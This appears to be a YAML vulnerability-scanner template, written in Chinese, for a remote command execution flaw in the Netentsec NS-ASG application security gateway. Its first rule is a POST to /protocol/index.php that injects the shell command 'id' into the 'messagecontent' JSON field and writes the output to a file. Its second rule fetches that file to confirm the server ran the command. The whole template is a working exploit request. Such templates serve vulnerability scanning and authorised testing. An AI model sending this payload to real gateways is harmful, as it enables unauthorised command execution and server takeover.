id: netentsec-ns-asg-rce

info:
  name: 网康 NS-ASG安全网关 index.php 远程命令执行漏洞
  author: zan8in
  severity: high
  verified: true
  description: |
    网康 NS-ASG安全网关 index.php文件存在远程命令执行漏洞，攻击者通过构造特殊的请求包可以获取服务器权限
     title=="网康 NS-ASG 应用安全网关"

set:
  randstr: randomLowercase(6)
rules:
  r0:
    request:
      method: POST
      path: /protocol/index.php
      body: jsoncontent={"protocolType":"getsysdatetime","messagecontent":"1;id>{{randstr}}.txt;"}
    expression: response.status == 200
  r1:
    request:
      method: GET
      path: /protocol/{{randstr}}.txt
    expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0() && r1()